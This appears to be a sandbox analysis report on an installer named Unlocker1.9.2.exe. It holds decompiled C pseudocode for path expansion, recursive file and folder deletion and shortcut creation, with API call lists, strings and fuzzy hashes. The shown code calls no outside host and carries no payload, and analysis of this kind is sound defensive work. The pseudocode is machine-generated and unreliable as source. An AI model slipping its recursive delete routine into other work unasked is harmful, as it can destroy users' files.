                                                                                                                                                              				signed char _v20;
                                                                                                                                                              				signed int _v24;
                                                                                                                                                              				signed char _v28;
                                                                                                                                                              				signed int _t36;
                                                                                                                                                              				CHAR* _t37;
                                                                                                                                                              				signed int _t39;
                                                                                                                                                              				int _t40;
                                                                                                                                                              				char _t50;
                                                                                                                                                              				char _t51;
                                                                                                                                                              				char _t53;
                                                                                                                                                              				char _t55;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				signed int _t69;
                                                                                                                                                              				intOrPtr _t73;
                                                                                                                                                              				signed int _t74;
                                                                                                                                                              				signed int _t75;
                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                              				char _t83;
                                                                                                                                                              				void* _t85;
                                                                                                                                                              				CHAR* _t86;
                                                                                                                                                              				void* _t88;
                                                                                                                                                              				signed int _t95;
                                                                                                                                                              				signed int _t97;
                                                                                                                                                              				void* _t98;
                                                                                                                                                              
                                                                                                                                                              				_t88 = __esi;
                                                                                                                                                              				_t85 = __edi;
                                                                                                                                                              				_t63 = __ebx;
                                                                                                                                                              				_t36 = _a8;
                                                                                                                                                              				if(_t36 < 0) {
                                                                                                                                                              					_t79 =  *0x42365c; // 0x7664ab
                                                                                                                                                              					_t36 =  *(_t79 - 4 + _t36 * 4);
                                                                                                                                                              				}
                                                                                                                                                              				_t73 =  *0x423eb8; // 0x745dec
                                                                                                                                                              				_t74 = _t73 + _t36;
                                                                                                                                                              				_t37 = 0x422e20;
                                                                                                                                                              				_push(_t63);
                                                                                                                                                              				_push(_t88);
                                                                                                                                                              				_push(_t85);
                                                                                                                                                              				_t86 = 0x422e20;
                                                                                                                                                              				if(_a4 - 0x422e20 < 0x800) {
                                                                                                                                                              					_t86 = _a4;
                                                                                                                                                              					_a4 = _a4 & 0x00000000;
                                                                                                                                                              				}
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t83 =  *_t74;
                                                                                                                                                              					if(_t83 == 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _t86 - _t37 - 0x400;
                                                                                                                                                              					if(_t86 - _t37 >= 0x400) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t74 = _t74 + 1;
                                                                                                                                                              					__eflags = _t83 - 0xfc;
                                                                                                                                                              					_a8 = _t74;
                                                                                                                                                              					if(__eflags <= 0) {
                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                              							 *_t86 = _t83;
                                                                                                                                                              							_t86 =  &(_t86[1]);
                                                                                                                                                              							__eflags = _t86;
                                                                                                                                                              						} else {
                                                                                                                                                              							 *_t86 =  *_t74;
                                                                                                                                                              							_t86 =  &(_t86[1]);
                                                                                                                                                              							_t74 = _t74 + 1;
                                                                                                                                                              						}
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					_t39 =  *(_t74 + 1);
                                                                                                                                                              					_t75 =  *_t74;
                                                                                                                                                              					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
                                                                                                                                                              					_a8 = _a8 + 2;
                                                                                                                                                              					_v28 = _t75 | 0x00000080;
                                                                                                                                                              					_t69 = _t75;
                                                                                                                                                              					_v24 = _t69;
                                                                                                                                                              					__eflags = _t83 - 0xfe;
                                                                                                                                                              					_v20 = _t39 | 0x00000080;
                                                                                                                                                              					_v16 = _t39;
                                                                                                                                                              					if(_t83 != 0xfe) {
                                                                                                                                                              						__eflags = _t83 - 0xfd;
                                                                                                                                                              						if(_t83 != 0xfd) {
                                                                                                                                                              							__eflags = _t83 - 0xff;
                                                                                                                                                              							if(_t83 == 0xff) {
                                                                                                                                                              								__eflags = (_t39 | 0xffffffff) - _t95;
                                                                                                                                                              								E004059FF(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
                                                                                                                                                              							}
                                                                                                                                                              							L41:
                                                                                                                                                              							_t40 = lstrlenA(_t86);
                                                                                                                                                              							_t74 = _a8;
                                                                                                                                                              							_t86 =  &(_t86[_t40]);
                                                                                                                                                              							_t37 = 0x422e20;
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _t95 - 0x1d;
                                                                                                                                                              						if(_t95 != 0x1d) {
                                                                                                                                                              							__eflags = (_t95 << 0xa) + 0x424000;
                                                                                                                                                              							E004059DD(_t86, (_t95 << 0xa) + 0x424000);
                                                                                                                                                              						} else {
                                                                                                                                                              							E0040593B(_t86,  *0x423e88);
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _t95 + 0xffffffeb - 7;
                                                                                                                                                              						if(_t95 + 0xffffffeb < 7) {
                                                                                                                                                              							L32:
                                                                                                                                                              							E00405C3F(_t86);
                                                                                                                                                              						}
                                                                                                                                                              						goto L41;
                                                                                                                                                              					}
                                                                                                                                                              					_t97 = 2;
                                                                                                                                                              					_t50 = GetVersion();
                                                                                                                                                              					__eflags = _t50;
                                                                                                                                                              					if(_t50 >= 0) {
                                                                                                                                                              						L12:
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						L13:
                                                                                                                                                              						__eflags =  *0x423f04;
                                                                                                                                                              						if( *0x423f04 != 0) {
                                                                                                                                                              							_t97 = 4;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _t69;
                                                                                                                                                              						if(_t69 >= 0) {
                                                                                                                                                              							__eflags = _t69 - 0x25;
                                                                                                                                                              							if(_t69 != 0x25) {
                                                                                                                                                              								__eflags = _t69 - 0x24;
                                                                                                                                                              								if(_t69 == 0x24) {
                                                                                                                                                              									GetWindowsDirectoryA(_t86, 0x400);
                                                                                                                                                              									_t97 = 0;
                                                                                                                                                              								}
                                                                                                                                                              								while(1) {
                                                                                                                                                              									__eflags = _t97;
                                                                                                                                                              									if(_t97 == 0) {
                                                                                                                                                              										goto L29;
                                                                                                                                                              									}
                                                                                                                                                              									_t51 =  *0x423e84; // 0x73d81340
                                                                                                                                                              									_t97 = _t97 - 1;
                                                                                                                                                              									__eflags = _t51;
                                                                                                                                                              									if(_t51 == 0) {
                                                                                                                                                              										L25:
                                                                                                                                                              										_t53 = SHGetSpecialFolderLocation( *0x423e88,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
                                                                                                                                                              										__eflags = _t53;
                                                                                                                                                              										if(_t53 != 0) {
                                                                                                                                                              											L27:
                                                                                                                                                              											 *_t86 =  *_t86 & 0x00000000;
                                                                                                                                                              											__eflags =  *_t86;
                                                                                                                                                              											continue;
                                                                                                                                                              										}
                                                                                                                                                              										__imp__SHGetPathFromIDListA(_v12, _t86);
                                                                                                                                                              										__imp__CoTaskMemFree(_v12);
                                                                                                                                                              										__eflags = _t53;
                                                                                                                                                              										if(_t53 != 0) {
                                                                                                                                                              											goto L29;
                                                                                                                                                              										}
                                                                                                                                                              										goto L27;
                                                                                                                                                              									}
                                                                                                                                                              									__eflags = _v8;
                                                                                                                                                              									if(_v8 == 0) {
                                                                                                                                                              										goto L25;
                                                                                                                                                              									}
                                                                                                                                                              									_t55 =  *_t51( *0x423e88,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86); // executed
                                                                                                                                                              									__eflags = _t55;
                                                                                                                                                              									if(_t55 == 0) {
                                                                                                                                                              										goto L29;
                                                                                                                                                              									}
                                                                                                                                                              									goto L25;
                                                                                                                                                              								}
                                                                                                                                                              								goto L29;
                                                                                                                                                              							}
                                                                                                                                                              							GetSystemDirectoryA(_t86, 0x400);
                                                                                                                                                              							goto L29;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t72 = (_t69 & 0x0000003f) +  *0x423eb8;
                                                                                                                                                              							E004058C4(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423eb8, _t86, _t69 & 0x00000040); // executed
                                                                                                                                                              							__eflags =  *_t86;
                                                                                                                                                              							if( *_t86 != 0) {
                                                                                                                                                              								L30:
                                                                                                                                                              								__eflags = _v16 - 0x1a;
                                                                                                                                                              								if(_v16 == 0x1a) {
                                                                                                                                                              									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                                                              								}
                                                                                                                                                              								goto L32;
                                                                                                                                                              							}
                                                                                                                                                              							E004059FF(_t72, _t86, _t97, _t86, _v16);
                                                                                                                                                              							L29:
                                                                                                                                                              							__eflags =  *_t86;
                                                                                                                                                              							if( *_t86 == 0) {
                                                                                                                                                              								goto L32;
                                                                                                                                                              							}
                                                                                                                                                              							goto L30;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _t50 - 0x5a04;
                                                                                                                                                              					if(_t50 == 0x5a04) {
                                                                                                                                                              						goto L12;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _v16 - 0x23;
                                                                                                                                                              					if(_v16 == 0x23) {
                                                                                                                                                              						goto L12;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _v16 - 0x2e;
                                                                                                                                                              					if(_v16 == 0x2e) {
                                                                                                                                                              						goto L12;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v8 = _v8 & 0x00000000;
                                                                                                                                                              						goto L13;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *_t86 =  *_t86 & 0x00000000;
                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                              					return _t37;
                                                                                                                                                              				}
                                                                                                                                                              				return E004059DD(_a4, _t37);
                                                                                                                                                              			}






























                                                                                                                                                              0x00405ac3
                                                                                                                                                              0x00405ac3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405ac3
                                                                                                                                                              0x00405ac1
                                                                                                                                                              0x00405c26
                                                                                                                                                              0x00405c30
                                                                                                                                                              0x00405c3c
                                                                                                                                                              0x00405c3c
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetVersion.KERNEL32(00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,00404DB3,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000), ref: 00405AA7
                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 00405B22
                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405B35
                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,007D06EE), ref: 00405B71
                                                                                                                                                              • SHGetPathFromIDListA.SHELL32(007D06EE,Remove folder: ), ref: 00405B7F
                                                                                                                                                              • CoTaskMemFree.OLE32(007D06EE), ref: 00405B8A
                                                                                                                                                              • lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BAC
                                                                                                                                                              • lstrlenA.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,00404DB3,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000), ref: 00405BFE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                              • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$]t
                                                                                                                                                              • API String ID: 900638850-3710924873
                                                                                                                                                              • Opcode ID: 2d5ebac93c140e73d4be386df5cf957c2dfe9d46f2c0b54d72834ecc596bd5b5
                                                                                                                                                              • Instruction ID: d3edd175ae4d098aa1e1d30cbcff8d3f456ad99068bf2b680a9da6a8a672f2a4
                                                                                                                                                              • Opcode Fuzzy Hash: 2d5ebac93c140e73d4be386df5cf957c2dfe9d46f2c0b54d72834ecc596bd5b5
                                                                                                                                                              • Instruction Fuzzy Hash: 30511471A04A04ABEB215F68DC84B7F3BB4EB55324F14423BE911B62D1D27C6981DF4E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              [Control-flow graph of function 00405302; legend: Executed / Not Executed]
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00405302(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				struct _WIN32_FIND_DATAA _v332;
                                                                                                                                                              				signed int _t37;
                                                                                                                                                              				char* _t49;
                                                                                                                                                              				signed int _t52;
                                                                                                                                                              				signed int _t55;
                                                                                                                                                              				signed int _t61;
                                                                                                                                                              				signed int _t63;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              				signed int _t68;
                                                                                                                                                              				CHAR* _t70;
                                                                                                                                                              				CHAR* _t72;
                                                                                                                                                              				char* _t75;
                                                                                                                                                              
                                                                                                                                                              				_t72 = _a4;
                                                                                                                                                              				_t37 = E004055B1(__eflags, _t72);
                                                                                                                                                              				_v12 = _t37;
                                                                                                                                                              				if((_a8 & 0x00000008) != 0) {
                                                                                                                                                              					_t63 = DeleteFileA(_t72); // executed
                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                              					_t65 =  ~_t63 + 1;
                                                                                                                                                              					 *0x423f08 =  *0x423f08 + _t65;
                                                                                                                                                              					return _t65;
                                                                                                                                                              				}
                                                                                                                                                              				_t68 = _a8 & 0x00000001;
                                                                                                                                                              				__eflags = _t68;
                                                                                                                                                              				_v8 = _t68;
                                                                                                                                                              				if(_t68 == 0) {
                                                                                                                                                              					L5:
                                                                                                                                                              					E004059DD(0x421480, _t72);
                                                                                                                                                              					__eflags = _t68;
                                                                                                                                                              					if(_t68 == 0) {
                                                                                                                                                              						E00405517(_t72);
                                                                                                                                                              					} else {
                                                                                                                                                              						lstrcatA(0x421480, "\*.*");
                                                                                                                                                              					}
                                                                                                                                                              					__eflags =  *_t72;
                                                                                                                                                              					if( *_t72 != 0) {
                                                                                                                                                              						L10:
                                                                                                                                                              						lstrcatA(_t72, 0x409010);
                                                                                                                                                              						L11:
                                                                                                                                                              						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
                                                                                                                                                              						_t37 = FindFirstFileA(0x421480,  &_v332); // executed
                                                                                                                                                              						__eflags = _t37 - 0xffffffff;
                                                                                                                                                              						_a4 = _t37;
                                                                                                                                                              						if(_t37 == 0xffffffff) {
                                                                                                                                                              							L29:
                                                                                                                                                              							__eflags = _v8;
                                                                                                                                                              							if(_v8 != 0) {
                                                                                                                                                              								_t31 = _t70 - 1;
                                                                                                                                                              								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                                                                                                                              								__eflags =  *_t31;
                                                                                                                                                              							}
                                                                                                                                                              							goto L31;
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L12;
                                                                                                                                                              						}
                                                                                                                                                              						do {
                                                                                                                                                              							L12:
                                                                                                                                                              							_t75 =  &(_v332.cFileName);
                                                                                                                                                              							_t49 = E004054FB( &(_v332.cFileName), 0x3f);
                                                                                                                                                              							__eflags =  *_t49;
                                                                                                                                                              							if( *_t49 != 0) {
                                                                                                                                                              								__eflags = _v332.cAlternateFileName;
                                                                                                                                                              								if(_v332.cAlternateFileName != 0) {
                                                                                                                                                              									_t75 =  &(_v332.cAlternateFileName);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *_t75 - 0x2e;
                                                                                                                                                              							if( *_t75 != 0x2e) {
                                                                                                                                                              								L19:
                                                                                                                                                              								E004059DD(_t70, _t75);
                                                                                                                                                              								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                                                                                                                              								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                              									E00405695(_t72);
                                                                                                                                                              									_t52 = DeleteFileA(_t72); // executed
                                                                                                                                                              									__eflags = _t52;
                                                                                                                                                              									if(_t52 != 0) {
                                                                                                                                                              										E00404D7B(0xfffffff2, _t72);
                                                                                                                                                              									} else {
                                                                                                                                                              										__eflags = _a8 & 0x00000004;
                                                                                                                                                              										if((_a8 & 0x00000004) == 0) {
                                                                                                                                                              											 *0x423f08 =  *0x423f08 + 1;
                                                                                                                                                              										} else {
                                                                                                                                                              											E00404D7B(0xfffffff1, _t72);
                                                                                                                                                              											_push(0);
                                                                                                                                                              											_push(_t72);
                                                                                                                                                              											E0040572B();
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              								} else {
                                                                                                                                                              									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                                                              									if(__eflags == 0) {
                                                                                                                                                              										E00405302(_t70, __eflags, _t72, _a8);
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								goto L27;
                                                                                                                                                              							}
                                                                                                                                                              							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                                                                                                                              							__eflags = _t61;
                                                                                                                                                              							if(_t61 == 0) {
                                                                                                                                                              								goto L27;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _t61 - 0x2e;
                                                                                                                                                              							if(_t61 != 0x2e) {
                                                                                                                                                              								goto L19;
                                                                                                                                                              							}
                                                                                                                                                              							__eflags =  *((char*)(_t75 + 2));
                                                                                                                                                              							if( *((char*)(_t75 + 2)) == 0) {
                                                                                                                                                              								goto L27;
                                                                                                                                                              							}
                                                                                                                                                              							goto L19;
                                                                                                                                                              							L27:
                                                                                                                                                              							_t55 = FindNextFileA(_a4,  &_v332); // executed
                                                                                                                                                              							__eflags = _t55;
                                                                                                                                                              						} while (_t55 != 0);
                                                                                                                                                              						_t37 = FindClose(_a4);
                                                                                                                                                              						goto L29;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags =  *0x421480 - 0x5c;
                                                                                                                                                              					if( *0x421480 != 0x5c) {
                                                                                                                                                              						goto L11;
                                                                                                                                                              					}
                                                                                                                                                              					goto L10;
                                                                                                                                                              				} else {
                                                                                                                                                              					__eflags = _t37;
                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                              						L31:
                                                                                                                                                              						__eflags = _v8;
                                                                                                                                                              						if(_v8 == 0) {
                                                                                                                                                              							L39:
                                                                                                                                                              							return _t37;
                                                                                                                                                              						}
                                                                                                                                                              						__eflags = _v12;
                                                                                                                                                              						if(_v12 != 0) {
                                                                                                                                                              							_t37 = E00405CD8(_t72);
                                                                                                                                                              							__eflags = _t37;
                                                                                                                                                              							if(_t37 == 0) {
                                                                                                                                                              								goto L39;
                                                                                                                                                              							}
                                                                                                                                                              							E004054D0(_t72);
                                                                                                                                                              							E00405695(_t72);
                                                                                                                                                              							_t37 = RemoveDirectoryA(_t72); // executed
                                                                                                                                                              							__eflags = _t37;
                                                                                                                                                              							if(_t37 != 0) {
                                                                                                                                                              								return E00404D7B(0xffffffe5, _t72);
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _a8 & 0x00000004;
                                                                                                                                                              							if((_a8 & 0x00000004) == 0) {
                                                                                                                                                              								goto L33;
                                                                                                                                                              							}
                                                                                                                                                              							E00404D7B(0xfffffff1, _t72);
                                                                                                                                                              							_push(0);
                                                                                                                                                              							_push(_t72);
                                                                                                                                                              							return E0040572B();
                                                                                                                                                              						}
                                                                                                                                                              						L33:
                                                                                                                                                              						 *0x423f08 =  *0x423f08 + 1;
                                                                                                                                                              						return _t37;
                                                                                                                                                              					}
                                                                                                                                                              					__eflags = _a8 & 0x00000002;
                                                                                                                                                              					if((_a8 & 0x00000002) == 0) {
                                                                                                                                                              						goto L31;
                                                                                                                                                              					}
                                                                                                                                                              					goto L5;
                                                                                                                                                              				}
                                                                                                                                                              			}

















                                                                                                                                                              0x004054a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054c5
                                                                                                                                                              0x004054ab
                                                                                                                                                              0x004054af
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054b4
                                                                                                                                                              0x004054b9
                                                                                                                                                              0x004054ba
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004054bb
                                                                                                                                                              0x00405482
                                                                                                                                                              0x00405482
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405482
                                                                                                                                                              0x0040534a
                                                                                                                                                              0x0040534e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040534e

                                                                                                                                                              APIs
                                                                                                                                                              • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405320
                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*,?,00000000,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 0040536A
                                                                                                                                                              • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*,?,00000000,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 0040538B
                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*,?,00000000,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 00405391
                                                                                                                                                              • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*,?,00000000,?,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000), ref: 004053A2
                                                                                                                                                              • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 00405454
                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00405465
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Unlocker1.9.2.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsv5446.tmp\*.*$\*.*
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                              			E00402020() {
                                                                                                                                                              				void* _t44;
                                                                                                                                                              				intOrPtr* _t48;
                                                                                                                                                              				intOrPtr* _t50;
                                                                                                                                                              				intOrPtr* _t52;
                                                                                                                                                              				intOrPtr* _t54;
                                                                                                                                                              				signed int _t58;
                                                                                                                                                              				intOrPtr* _t59;
                                                                                                                                                              				intOrPtr* _t62;
                                                                                                                                                              				intOrPtr* _t64;
                                                                                                                                                              				intOrPtr* _t66;
                                                                                                                                                              				intOrPtr* _t69;
                                                                                                                                                              				intOrPtr* _t71;
                                                                                                                                                              				int _t75;
                                                                                                                                                              				signed int _t81;
                                                                                                                                                              				intOrPtr* _t88;
                                                                                                                                                              				void* _t95;
                                                                                                                                                              				void* _t96;
                                                                                                                                                              				short* _t99;
                                                                                                                                                              				void* _t100;
                                                                                                                                                              
                                                                                                                                                              				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
                                                                                                                                                              				_t96 = E004029F6(0xffffffdf);
                                                                                                                                                              				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
                                                                                                                                                              				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
                                                                                                                                                              				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
                                                                                                                                                              				if(E0040553D(_t96) == 0) {
                                                                                                                                                              					E004029F6(0x21);
                                                                                                                                                              				}
                                                                                                                                                              				_t44 = _t100 + 8;
                                                                                                                                                              				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44); // executed
                                                                                                                                                              				if(_t44 < _t75) {
                                                                                                                                                              					L13:
                                                                                                                                                              					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                                                                                                              					_push(0xfffffff0);
                                                                                                                                                              				} else {
                                                                                                                                                              					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                                                              					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
                                                                                                                                                              					if(_t95 >= _t75) {
                                                                                                                                                              						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                                                              						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                                                                                                              						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                                                              						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Program Files\\Unlocker");
                                                                                                                                                              						_t81 =  *(_t100 - 0x14);
                                                                                                                                                              						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                                                                                                              						if(_t58 != 0) {
                                                                                                                                                              							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                                                              							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                                                                                                              							_t81 =  *(_t100 - 0x14);
                                                                                                                                                              						}
                                                                                                                                                              						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                                                              						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                                                                                                              						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                                                                                                                                                              							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                                                              							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                                                                                                                                                              						}
                                                                                                                                                              						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                                                              						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                                                                                                                              						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                                                              						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                                                                                                                                              						if(_t95 >= _t75) {
                                                                                                                                                              							_t99 = L"C:\\Users\\jones\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Unlocker\\Uninstall.lnk";
                                                                                                                                                              							_t95 = 0x80004005;
                                                                                                                                                              							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, _t99, 0x400) != 0) {
                                                                                                                                                              								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                                                                                                                                                              								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, _t99, 1);
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                                                                                                                                                              						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                                                                                                              					}
                                                                                                                                                              					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                                                              					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                                                                                                              					if(_t95 >= _t75) {
                                                                                                                                                              						_push(0xfffffff4);
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L13;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				E00401423();
                                                                                                                                                              				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t100 - 4));
                                                                                                                                                              				return 0;
                                                                                                                                                              			}






















                                                                                                                                                              0x004020d4
                                                                                                                                                              0x004020de
                                                                                                                                                              0x004020e6
                                                                                                                                                              0x004020eb
                                                                                                                                                              0x004020f7
                                                                                                                                                              0x004020f7
                                                                                                                                                              0x004020fa
                                                                                                                                                              0x00402103
                                                                                                                                                              0x00402106
                                                                                                                                                              0x0040210f
                                                                                                                                                              0x00402114
